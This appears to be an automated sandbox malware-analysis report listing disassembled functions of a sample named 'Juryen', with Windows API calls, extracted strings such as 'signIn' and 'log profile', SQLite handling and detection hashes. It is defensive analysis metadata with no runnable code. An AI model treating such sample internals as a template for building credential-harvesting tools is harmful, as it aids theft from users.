                                                                    • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                    • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                    Function 00413A3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004133E1,00000000,00000000), ref: 00413A7A
                                                                    • memset.MSVCRT ref: 00413ADC
                                                                    • memset.MSVCRT ref: 00413AEC
                                                                      • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                    • memset.MSVCRT ref: 00413BD7
                                                                    • wcscpy.MSVCRT ref: 00413BF8
                                                                    • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,00000000), ref: 00413C4E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                    • String ID: 3A
                                                                    • API String ID: 3300951397-293699754
                                                                    • Opcode ID: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                    • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                    • Opcode Fuzzy Hash: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                    • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                    Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                    • wcscpy.MSVCRT ref: 0040D1B5
                                                                      • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                      • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                    • wcslen.MSVCRT ref: 0040D1D3
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                    • LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                    • memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                    • String ID: strings
                                                                    • API String ID: 3166385802-3030018805
                                                                    • Opcode ID: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                    • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                    • Opcode Fuzzy Hash: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                    • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                    Function 00411AC5 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 59COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00411AF6
                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                    • wcsrchr.MSVCRT ref: 00411B14
                                                                    • wcscat.MSVCRT ref: 00411B2E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                    • String ID: AE$.cfg$General$EA
                                                                    • API String ID: 776488737-1622828088
                                                                    • Opcode ID: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                    • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                    • Opcode Fuzzy Hash: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                    • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                    Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040D8BD
                                                                    • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                    • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                    • memset.MSVCRT ref: 0040D906
                                                                    • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                    • _wcsicmp.MSVCRT ref: 0040D92F
                                                                      • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                      • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                    • String ID: sysdatetimepick32
                                                                    • API String ID: 1028950076-4169760276
                                                                    • Opcode ID: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                    • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                    • Opcode Fuzzy Hash: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                    • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                    Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                    • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                    • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                    • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                    • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                    • memset.MSVCRT ref: 0041BA3D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$memset
                                                                    • String ID: -journal$-wal
                                                                    • API String ID: 438689982-2894717839
                                                                    • Opcode ID: 070149fd6e6b60b17c82d9fb7164138c534913cb2d5c63aa2997da2af33d5e6c
                                                                    • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                    • Opcode Fuzzy Hash: 070149fd6e6b60b17c82d9fb7164138c534913cb2d5c63aa2997da2af33d5e6c
                                                                    • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                    Function 00405B83 Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                    • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                    • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                      • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                      • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                    • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                    • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Item$Dialog$MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3975816621-0
                                                                    • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                    • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                    • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                    • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                    Function 00444C89 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _wcsicmp.MSVCRT ref: 00444D09
                                                                    • _wcsicmp.MSVCRT ref: 00444D1E
                                                                    • _wcsicmp.MSVCRT ref: 00444D33
                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                      • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsicmp$wcslen$_memicmp
                                                                    • String ID: .save$http://$https://$log profile$signIn
                                                                    • API String ID: 1214746602-2708368587
                                                                    • Opcode ID: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                    • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                    • Opcode Fuzzy Hash: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                    • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                    Function 00405DD1 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                                    • memset.MSVCRT ref: 00405E33
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                                    • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                                    • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                    • String ID:
                                                                    • API String ID: 2313361498-0
                                                                    • Opcode ID: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                    • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                    • Opcode Fuzzy Hash: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                    • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                    Function 00405F4E Relevance: 12.1, APIs: 8, Instructions: 89windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetClientRect.USER32(?,?), ref: 00405F65
                                                                    • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                    • GetWindow.USER32(00000000), ref: 00405F80
                                                                      • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                    • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                    • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                    • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                    • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                    • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ItemMessageRectSend$Client
                                                                    • String ID:
                                                                    • API String ID: 2047574939-0
                                                                    • Opcode ID: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                    • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                    • Opcode Fuzzy Hash: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                    • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                    Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                    • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                    • GetTickCount.KERNEL32 ref: 0041887D
                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                    • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                    • String ID:
                                                                    • API String ID: 4218492932-0
                                                                    • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                    • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                    • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                    • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                    Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                      • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                      • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                      • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                    • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                    • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                    • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                      • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                      • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                    • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                    • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                    • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$memset
                                                                    • String ID: gj
                                                                    • API String ID: 438689982-4203073231
                                                                    • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                    • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                    • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                    • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                    Function 00430C36 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 135COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                    • API String ID: 3510742995-2446657581
                                                                    • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                    • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                    • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                    • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                    Function 00405A0E Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                    • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                    • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                    • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                    • memset.MSVCRT ref: 00405ABB
                                                                    • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                    • SetFocus.USER32(?), ref: 00405B76
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$FocusItemmemset
                                                                    • String ID:
                                                                    • API String ID: 4281309102-0
                                                                    • Opcode ID: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                                    • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                    • Opcode Fuzzy Hash: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                                    • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                    Function 0040FA33 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _snwprintfwcscat
                                                                    • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                    • API String ID: 384018552-4153097237
                                                                    • Opcode ID: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                                    • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                    • Opcode Fuzzy Hash: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                                    • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                    Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMenu$CountInfomemsetwcschr
                                                                    • String ID: 0$6
                                                                    • API String ID: 2029023288-3849865405
                                                                    • Opcode ID: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                                    • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                    • Opcode Fuzzy Hash: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                                    • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
